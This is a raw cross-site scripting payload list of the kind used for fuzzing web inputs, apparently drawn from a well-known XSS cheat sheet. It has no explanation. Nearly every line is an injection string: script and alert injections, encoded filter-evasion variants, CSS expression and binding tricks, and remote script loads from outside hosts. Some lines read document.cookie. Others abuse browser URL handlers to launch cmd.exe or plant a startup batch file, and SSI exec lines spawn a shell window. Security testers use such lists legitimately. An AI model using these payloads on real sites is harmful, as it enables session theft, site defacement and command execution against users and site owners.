<script>alert('xss')</script>
<script>alert(string.fromcharcode(88,83,83))</script>
</title><script>alert(1)</script>
'> <script>alert(3)</script>
`> <script>alert(5)</script>
> <script>alert(4)</script>
</title><script>alert(1)</script>
<<script>alert("xss");//<</script>
>"'
'';!--"<XSS>=&{()}
*/a=eval;b=alert;a(b(/e/.source));/*
'%uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e'
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
%26%2339);x=alert;x(%26%2340 /finally through!/.source %26%2341);//
</noscript><br><code onmouseover=a=eval;b=alert;a(b(/h/.source));>MOVE MOUSE OVER THIS AREA</code>
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
<BODY onload!#$%&()*~+-_.,:;?@[/|\\]^`=alert("XSS")>
perl -e 'print "<SCR\0IPT>alert("XSS")</SCR\0IPT>";' > out
<DIV STYLE="background-image: url(http://ha.ckers.org/xss.js)">Div Body</DIV> 
alert(1)
A=alert;A(1)
+alert(0)+
';//%0da=eval;b=alert;a(b(9));//
a=1;a=eval;b=alert;a(b(11));//
'};a=eval;b=alert;a(b(13));//
1};a=eval;b=alert;a(b(14));//
'];a=eval;b=alert;a(b(15));//
1];a=eval;b=alert;a(b(17));//
1;a=eval;b=alert;a(b(/c/.source));
xyz onerror=alert(6);
> XSS | Replacive Fuzzers
>>This is a comment line to be changed in the future
<img src=`x` onrerror= ` ;; alert(1) ` />
</a style=""xx:expr/**/ession(document.appendChild(document.createElement('script')).src='http://h4k.in/i.js')">
style=color: expression(alert(0));" a="
vbscript:Execute(MsgBox(chr(88)&chr(83)&chr(83)))<
width: expression((window.r==document.cookie)?'':alert(r=document.cookie))
<!--[if gte IE 4]><SCRIPT>alert('XSS');</SCRIPT><![endif]-->
<DIV STYLE="width: expression(alert('XSS'));">
<IMG SRC="jav&#x0A;ascript:alert('XSS');">
<IMG SRC="javascript:alert('XSS');">
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
<IMG SRC=`javascript:alert("RSnake says### 'XSS'")`>
<IMG SRC="javascript:alert('XSS')"
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
<IMG SRC=javascript:alert(&quot;XSS&quot;)>
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
<IMG SRC=javascript:alert(String.fromCharCode(88###83###83))>
<IMG DYNSRC="javascript:alert('XSS');">
<IMG LOWSRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
exp/*<XSS STYLE='no\xss:noxss("*//*");xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("XSS"))'>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC='vbscript:msgbox("XSS")'>
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
<XSS STYLE="behavior: url(http://ha.ckers.org/xss.htc);">
<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
<IMGSRC="javascript:alert('XSS')">
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>
<IMG SRC=" &#14;  javascript:alert('XSS');">
<XSS STYLE="xss:expression(alert('XSS'))">
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
firefoxurl:test|"%20-new-window%20javascript:alert(\'Cross%2520Browser%2520Scripting!\');"
res://c:\\program%20files\\adobe\\acrobat%207.0\\acrobat\\acrobat.dll/#2/#210
>%22%27><img%20src%3d%22javascript:alert(%27%20XSS%27)%22>
> XSS | Replacive Fuzzers
>>This is a comment line to be changed in the future
(1?(1?{a:1?""[1?"ev\a\l":0](1?"\a\lert":0):0}:0).a:0)[1?"\c\a\l\l":0](content,1?"x\s\s":0)
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
<SCRIPT SRC=http://ha.ckers.org/xss.js
<A HREF="http://google:ha.ckers.org">XSS</A>
<A HREF="http://ha.ckers.org@google">XSS</A>
<A HREF="//google">XSS</A>
<IFRAME SRC=http://ha.ckers.org/scriptlet.html <
y=<a>alert</a>;content[y](123)
sstyle=foobar"tstyle="foobar"ystyle="foobar"lstyle="foobar"estyle="foobar"=-moz-binding:url(http://h4k.in/mozxss.xml#xss)>foobar</b>#xss)" a="
with(document.__parent__)alert(1)
style=-moz-binding:url(http://h4k.in/mozxss.xml#xss);" a="
style=color: expression(alert(0));" a="
style=-moz-binding:url(http://h4k.in/mozxss.xml#xss);" a="
width: expression((window.r==document.cookie)?'':alert(r=document.cookie))
sstyle=foobar"tstyle="foobar"ystyle="foobar"lstyle="foobar"estyle="foobar"=-moz-binding:url(http://h4k.in/mozxss.xml#xss)>foobar</b>#xss)" a="
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">
<DIV STYLE="width: expression(alert('XSS'));">
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
<s>000<s>%3cs%3e111%3c/s%3e%3c%73%3e%32%32%32%3c%2f%73%3e&#60&#115&#62&#51&#51&#51&#60&#47&#115&#62&#x3c&#x73&#x3e&#x34&#x34&#x34&#x3c&#x2f&#x73&#x3e
';alert(0)//\';alert(1)//";alert(2)//\";alert(3)//--></SCRIPT>">'><SCRIPT>alert(4)</SCRIPT>=&{}");}alert(6);function xss(){//
';alert(0)//\';alert(1)//";alert(2)//\";alert(3)//--></SCRIPT>">'></title><SCRIPT>alert(4)</SCRIPT>=&{</title><script>alert(5)</script>}");}
'';!--"<script>alert(0);</script>=&{(alert(1))}
</title><script>alert(1)</script>
</textarea><br><code onmouseover=a=eval;b=alert;a(b(/g/.source));>MOVE MOUSE OVER THIS AREA</code>
'';!--"<XSS>=&{()}
<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT ="blah" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a="blah" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT SRC=http://ha.ckers.org/xss.js
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=`javascript:alert("XSS says, 'XSS'")`>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">",
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
<IMG SRC="jav&#x0D;ascript:alert('XSS');">
<IMG SRC="jav&#x09;ascript:alert(<WBR>'XSS');">
<IMG SRC="jav&#x0A;ascript:alert(<WBR>'XSS');">
/XSS STYLE=xss:expression(alert('XSS'))>
XSS STYLE=xss:e/**/xpression(alert('XSS'))>
XSS-STYLE=xss:e/**/xpression(alert('XSS'))>
XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
"><script>alert('XSS')</script>
<xml id=i><x><c><![cdata[<img src="javas]]><![cdata[cript:alert('xss');">]]></c></x></xml><span datasrc=#i datafld=c dataformatas=html>
<xml id="xss"><i><b><img src="javas<!-- -->cript:alert('xss')"></b></i></xml><span datasrc="#xss" datafld="b" dataformatas="html"></span>
<html><body><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributename="innerhtml" to="xss<script defer>alert('xss')</script>"> </body></html>
<html xmlns:xss><?import namespace="xss" implementation="httP://ha.ckers.org/xss.htc"><xss:xss>xss</xss:xss></html>
<xml src="httP://ha.ckers.org/xsstest.xml" id=i></xml><span datasrc=#i datafld=c dataformatas=html></span>
<?xml version="1.0"?><html:html xmlns:html='httP://www.w3.org/1999/xhtml'><html:script>alert(document.cookie);</html:script></html:html>
aim: &c:\windows\system32\calc.exe" ini="C:\Documents and Settings\All Users\Start Menu\Programs\Startup\pwnd.bat"
firefoxurl:test|"%20-new-window%20javascript:alert(\'Cross%2520Browser%2520Scripting!\');"
navigatorurl:test" -chrome "javascript:C=Components.classes;I=Components.interfaces;file=C[\'@mozilla.org/file/local;1\'].createInstance(I.nsILocalFile);file.initWithPath(\'C:\'+String.fromCharCode(92)+String.fromCharCode(92)+\'Windows\'+String.fromCharCode(92)+String.fromCharCode(92)+\'System32\'+String.fromCharCode(92)+String.fromCharCode(92)+\'cmd.exe\');process=C[\'@mozilla.org/process/util;1\'].createInstance(I.nsIProcess);process.init(file);process.run(true%252c{}%252c0);alert(process)
res://c:\\program%20files\\adobe\\acrobat%207.0\\acrobat\\acrobat.dll/#2/#210
<body onload=;a2={y:eval};a1={x:a2.y('al'+'ert')};;;;;;;;;_=a1.x;_(1);;;;
<body onload=a1={x:this.parent.document};a1.x.writeln(1);>
<body onload=;a1={x:document};;;;;;;;;_=a1.x;_.write(1);;;;
<body/s/onload=x={doc:parent.document};x.doc.writeln(1)
<body/????$/onload=x={doc:parent[�document�]};x.doc.writeln(1)
<!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://ha.ckers.org/xss.js></SCRIPT>'"-->
<!--#exec cmd=""/usr/X11R6/bin/xterm ?display 127.0.0.1:0 &""-->
httP://aa"><script>alert(123)</script>
httP://aa'><script>alert(123)</script>
httP://aa<script>alert(123)</script>
&#60;SCRIPT&#62;alert&#40;&#39;XSS&#39;&#41;&#60;&#47;SCRIPT&#62;
&#60;SCRIPT SRC&#61;http&#58;&#47;&#47;testsite.com&#47;xss.js&#62;&#60;&#47;SCRIPT&#62;
&#60;SCRIPT&#62;alert&#40;String.fromCharCode&#40;88,83,83&#41;&#41;&#60;&#47;SCRIPT&#62;
&#60;BASE HREF&#61;&#34;javascript&#58;alert&#40;&#39;XSS&#39;&#41;&#59;&#47;&#47;&#34;&#62;
&#60;BGSOUND SRC&#61;&#34;javascript&#58;alert&#40;&#39;XSS&#39;&#41;&#59;&#34;&#62;
&#60;BODY BACKGROUND&#61;&#34;javascript&#58;alert&#40;&#39;XSS&#39;&#41;&#59;&#34;&#62;
&#60;BODY ONLOAD&#61;alert&#40;&#39;XSS&#39;&#41;&#62;
&#60;DIV STYLE&#61;&#34;background-image&#58; url&#40;javascript&#58;alert&#40;&#39;XSS&#39;&#41;&#41;&#34;&#62;
&#60;DIV STYLE&#61;&#34;background-image&#58; url&#40;&#38;&#35;1&#59;javascript&#58;alert&#40;&#39;XSS&#39;&#41;&#41;&#34;&#62;
&#60;DIV STYLE&#61;&#34;width&#58; expression&#40;alert&#40;&#39;XSS&#39;&#41;&#41;&#59;&#34;&#62;
&#60;FRAMESET&#62;&#60;FRAME SRC&#61;&#34;javascript&#58;alert&#40;&#39;XSS&#39;&#41;&#59;&#34;&#62;&#60;&#47;FRAMESET&#62;
&#60;IFRAME SRC&#61;&#34;javascript&#58;alert&#40;&#39;XSS&#39;&#41;&#59;&#34;&#62;&#60;&#47;IFRAME&#62;
&#60;INPUT TYPE&#61;&#34;IMAGE&#34; SRC&#61;&#34;javascript&#58;alert&#40;&#39;XSS&#39;&#41;&#59;&#34;&#62;
&#60;IMG SRC&#61;&#34;javascript&#58;alert&#40;&#39;XSS&#39;&#41;&#59;&#34;&#62;
&#60;IMG SRC&#61;javascript&#58;alert&#40;&#39;XSS&#39;&#41;&#62;
&#60;IMG DYNSRC&#61;&#34;javascript&#58;alert&#40;&#39;XSS&#39;&#41;&#59;&#34;&#62;
&#60;IMG LOWSRC&#61;&#34;javascript&#58;alert&#40;&#39;XSS&#39;&#41;&#59;&#34;&#62;
&#60;IMG SRC&#61;&#34;http&#58;&#47;&#47;www.thesiteyouareon.com&#47;somecommand.php&#63;somevariables&#61;maliciouscode&#34;&#62;
&#60;STYLE&#62;li &#123;list-style-image&#58; url&#40;&#34;javascript&#58;alert&#40;&#39;XSS&#39;&#41;&#34;&#41;&#59;&#125;&#60;&#47;STYLE&#62;&#60;UL&#62;&#60;LI&#62;XSS
&#60;IMG SRC&#61;&#39;vbscript&#58;msgbox&#40;&#34;XSS&#34;&#41;&#39;&#62;
&#60;LAYER SRC&#61;&#34;http&#58;&#47;&#47;testsite.com&#47;scriptlet.html&#34;&#62;&#60;&#47;LAYER&#62;
&#60;IMG SRC&#61;&#34;livescript&#58;&#91;code&#93;&#34;&#62;
&#37;BCscript&#37;BEalert&#40;&#37;A2XSS&#37;A2&#41;&#37;BC&#47;script&#37;BE
&#60;META HTTP-EQUIV&#61;&#34;refresh&#34; CONTENT&#61;&#34;0&#59;url&#61;javascript&#58;alert&#40;&#39;XSS&#39;&#41;&#59;&#34;&#62;
&#60;META HTTP-EQUIV&#61;&#34;refresh&#34; CONTENT&#61;&#34;0&#59;url&#61;data&#58;text&#47;html&#59;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K&#34;&#62;
&#60;META HTTP-EQUIV&#61;&#34;refresh&#34; CONTENT&#61;&#34;0&#59; URL&#61;http&#58;&#47;&#47;&#59;URL&#61;javascript&#58;alert&#40;&#39;XSS&#39;&#41;&#59;&#34;&#62;
&#60;IMG SRC&#61;&#34;mocha&#58;&#91;code&#93;&#34;&#62;
&#60;STYLE TYPE&#61;&#34;text&#47;javascript&#34;&#62;alert&#40;&#39;XSS&#39;&#41;&#59;&#60;&#47;STYLE&#62;
&#60;IMG STYLE&#61;&#34;xss&#58;expr&#47;&#42;XSS&#42;&#47;ession&#40;alert&#40;&#39;XSS&#39;&#41;&#41;&#34;&#62;
&#60;XSS STYLE&#61;&#34;xss&#58;expression&#40;alert&#40;&#39;XSS&#39;&#41;&#41;&#34;&#62;
&#60;STYLE&#62;.XSS&#123;background-image&#58;url&#40;&#34;javascript&#58;alert&#40;&#39;XSS&#39;&#41;&#34;&#41;&#59;&#125;&#60;&#47;STYLE&#62;&#60;A CLASS&#61;XSS&#62;&#60;&#47;A&#62;
&#60;STYLE type&#61;&#34;text&#47;css&#34;&#62;BODY&#123;background&#58;url&#40;&#34;javascript&#58;alert&#40;&#39;XSS&#39;&#41;&#34;&#41;&#125;&#60;&#47;STYLE&#62;
&#60;LINK REL&#61;&#34;stylesheet&#34; HREF&#61;&#34;javascript&#58;alert&#40;&#39;XSS&#39;&#41;&#59;&#34;&#62;
&#60;LINK REL&#61;&#34;stylesheet&#34; HREF&#61;&#34;http&#58;&#47;&#47;testsite.com&#47;xss.css&#34;&#62;
&#60;STYLE&#62;&#64;import&#39;http&#58;&#47;&#47;testsite.com&#47;xss.css&#39;&#59;&#60;&#47;STYLE&#62;
&#60;META HTTP-EQUIV&#61;&#34;Link&#34; Content&#61;&#34;&#60;http&#58;&#47;&#47;testsite.com&#47;xss.css&#62;&#59; REL&#61;stylesheet&#34;&#62;
&#60;STYLE&#62;BODY&#123;-moz-binding&#58;url&#40;&#34;http&#58;&#47;&#47;testsite.com&#47;xssmoz.xml&#35;xss&#34;&#41;&#125;&#60;&#47;STYLE&#62;
&#60;TABLE BACKGROUND&#61;&#34;javascript&#58;alert&#40;&#39;XSS&#39;&#41;&#34;&#62;&#60;&#47;TABLE&#62;
&#60;TABLE&#62;&#60;TD BACKGROUND&#61;&#34;javascript&#58;alert&#40;&#39;XSS&#39;&#41;&#34;&#62;&#60;&#47;TD&#62;&#60;&#47;TABLE&#62;
&#60;HTML xmlns&#58;xss&#62; &#60;&#63;import namespace&#61;&#34;xss&#34; implementation&#61;&#34;http&#58;&#47;&#47;testsite.com&#47;xss.htc&#34;&#62; &#60;xss&#58;xss&#62;XSS&#60;&#47;xss&#58;xss&#62; &#60;&#47;HTML&#62;
&#60;XML ID&#61;I&#62;&#60;X&#62;&#60;C&#62;&#60;&#33;&#91;CDATA&#91;&#60;IMG SRC&#61;&#34;javas&#93;&#93;&#62;&#60;&#33;&#91;CDATA&#91;cript&#58;alert&#40;&#39;XSS&#39;&#41;&#59;&#34;&#62;&#93;&#93;&#62; &#60;&#47;C&#62;&#60;&#47;X&#62;&#60;&#47;xml&#62;&#60;SPAN DATASRC&#61;&#35;I DATAFLD&#61;C DATAFORMATAS&#61;HTML&#62;
&#60;XML ID&#61;&#34;xss&#34;&#62;&#60;I&#62;&#60;B&#62;&#60;IMG SRC&#61;&#34;javas&#60;&#33;-- --&#62;cript&#58;alert&#40;&#39;XSS&#39;&#41;&#34;&#62;&#60;&#47;B&#62;&#60;&#47;I&#62;&#60;&#47;XML&#62; &#60;SPAN DATASRC&#61;&#34;&#35;xss&#34; DATAFLD&#61;&#34;B&#34; DATAFORMATAS&#61;&#34;HTML&#34;&#62;&#60;&#47;SPAN&#62;
&#60;XML SRC&#61;&#34;http&#58;&#47;&#47;testsite.com&#47;xsstest.xml&#34; ID&#61;I&#62;&#60;&#47;XML&#62; &#60;SPAN DATASRC&#61;&#35;I DATAFLD&#61;C DATAFORMATAS&#61;HTML&#62;&#60;&#47;SPAN&#62;
&#60;&#33;--&#91;if gte IE 4&#93;&#62; &#60;SCRIPT&#62;alert&#40;&#39;XSS&#39;&#41;&#59;&#60;&#47;SCRIPT&#62; &#60;&#33;&#91;endif&#93;--&#62;
&#60;META HTTP-EQUIV&#61;&#34;Set-Cookie&#34; Content&#61;&#34;USERID&#61;&#60;SCRIPT&#62;alert&#40;&#39;XSS&#39;&#41;&#60;&#47;SCRIPT&#62;&#34;&#62;
&#60;XSS STYLE&#61;&#34;behavior&#58; url&#40;http&#58;&#47;&#47;testsite.com&#47;xss.htc&#41;&#59;&#34;&#62;
&#60;SCRIPT SRC&#61;&#34;http&#58;&#47;&#47;testsite.com&#47;xss.jpg&#34;&#62;&#60;&#47;SCRIPT&#62;
&#60;BR SIZE&#61;&#34;&#38;&#123;alert&#40;&#39;XSS&#39;&#41;&#125;&#34;&#62;
&#60;IMG SRC&#61;JaVaScRiPt&#58;alert&#40;&#39;XSS&#39;&#41;&#62;
&#60;IMG SRC&#61;javascript&#58;alert&#40;&#38;quot&#59;XSS&#38;quot&#59;&#41;&#62;
&#60;IMG SRC&#61;javascript&#58;alert&#40;String.fromCharCode&#40;88,83,83&#41;&#41;&#62;
&#60;&#47;TITLE&#62;&#60;SCRIPT&#62;alert&#40;&#34;XSS&#34;&#41;&#59;&#60;&#47;SCRIPT&#62;
&#60;STYLE&#62;&#64;im&#92;port&#39;&#92;ja&#92;vasc&#92;ript&#58;alert&#40;&#34;XSS&#34;&#41;&#39;&#59;&#60;&#47;STYLE&#62;
&#60;IMG SRC&#61;&#34;jav ascript&#58;alert&#40;&#39;XSS&#39;&#41;&#59;&#34;&#62;
&#60;IMG SRC&#61;&#34;jav&#38;&#35;x09&#59;ascript&#58;alert&#40;&#39;XSS&#39;&#41;&#59;&#34;&#62;
&#60;IMG SRC&#61;&#34;jav&#38;&#35;x0A&#59;ascript&#58;alert&#40;&#39;XSS&#39;&#41;&#59;&#34;&#62;
&#60;IMG SRC&#61;&#34;jav&#38;&#35;x0D&#59;ascript&#58;alert&#40;&#39;XSS&#39;&#41;&#59;&#34;&#62;
&#60;IMG SRC &#61; &#34; j a v a s c r i p t &#58; a l e r t &#40; &#39; X S S &#39; &#41; &#34; &#62;
perl -e &#39;print &#34;&#60;IMG SRC&#61;java&#92;0script&#58;alert&#40;&#34;XSS&#34;&#41;&#62;&#34;&#59;&#39;&#62; out
perl -e &#39;print &#34;&#38;&#60;SCR&#92;0IPT&#62;alert&#40;&#34;XSS&#34;&#41;&#60;&#47;SCR&#92;0IPT&#62;&#34;&#59;&#39; &#62; out
&#60;IMG SRC&#61;&#34; &#38;&#35;14&#59; javascript&#58;alert&#40;&#39;XSS&#39;&#41;&#59;&#34;&#62;
&#60;SCRIPT&#47;XSS SRC&#61;&#34;http&#58;&#47;&#47;testsite.com&#47;xss.js&#34;&#62;&#60;&#47;SCRIPT&#62;
&#60;BODY onload&#33;&#35;&#36;&#37;&#38;&#40;&#41;&#42;&#126;&#43;-_.,&#58;&#59;&#63;&#64;&#91;&#47;&#124;&#92;&#93;&#94;&#96;&#61;alert&#40;&#34;XSS&#34;&#41;&#62;
&#60;SCRIPT SRC&#61;http&#58;&#47;&#47;testsite.com&#47;xss.js
&#60;SCRIPT SRC&#61;&#47;&#47;testsite.com&#47;.j&#62;
&#60;IMG SRC&#61;&#34;javascript&#58;alert&#40;&#39;XSS&#39;&#41;&#34;
&#60;IFRAME SRC&#61;http&#58;&#47;&#47;testsite.com&#47;scriptlet.html &#60;
&#60;&#60;SCRIPT&#62;alert&#40;&#34;XSS&#34;&#41;&#59;&#47;&#47;&#60;&#60;&#47;SCRIPT&#62;
&#60;IMG &#34;&#34;&#34;&#62;&#60;SCRIPT&#62;alert&#40;&#34;XSS&#34;&#41;&#60;&#47;SCRIPT&#62;&#34;&#62;
&#60;SCRIPT&#62;a&#61;&#47;XSS&#47; alert&#40;a.source&#41;&#60;&#47;SCRIPT&#62;
&#60;P STYLE&#61;&#34;behavior&#58;url&#40;&#39;&#35;default&#35;time2&#39;&#41;&#34; onEnd&#61;&#34;alert&#40;&#39;XSS&#39;&#41;&#34;&#62;
&#60;SCRIPT a&#61;&#34;&#62;&#34; SRC&#61;&#34;http&#58;&#47;&#47;testsite.com&#47;xss.js&#34;&#62;&#60;&#47;SCRIPT&#62;
&#60;SCRIPT &#61;&#34;blah&#34; SRC&#61;&#34;http&#58;&#47;&#47;testsite.com&#47;xss.js&#34;&#62;&#60;&#47;SCRIPT&#62;
&#60;SCRIPT a&#61;&#34;blah&#34; &#39;&#39; SRC&#61;&#34;http&#58;&#47;&#47;testsite.com&#47;xss.js&#34;&#62;&#60;&#47;SCRIPT&#62;
&#60;SCRIPT &#34;a&#61;&#39;&#62;&#39;&#34; SRC&#61;&#34;http&#58;&#47;&#47;testsite.com&#47;xss.js&#34;&#62;&#60;&#47;SCRIPT&#62;
&#60;SCRIPT a&#61;&#96;&#62;&#96; SRC&#61;&#34;http&#58;&#47;&#47;testsite.com&#47;xss.js&#34;&#62;&#60;&#47;SCRIPT&#62;
&#60;SCRIPT&#62;document.write&#40;&#34;&#60;SCRI&#34;&#41;&#59;&#60;&#47;SCRIPT&#62;PT SRC&#61;&#34;http&#58;&#47;&#47;testsite.com&#47;xss.js&#34;&#62;&#60;&#47;SCRIPT&#62;
&#60;SCRIPT a&#61;&#34;&#62;&#39;&#62;&#34; SRC&#61;&#34;http&#58;&#47;&#47;testsite.com&#47;xss.js&#34;&#62;&#60;&#47;SCRIPT&#62;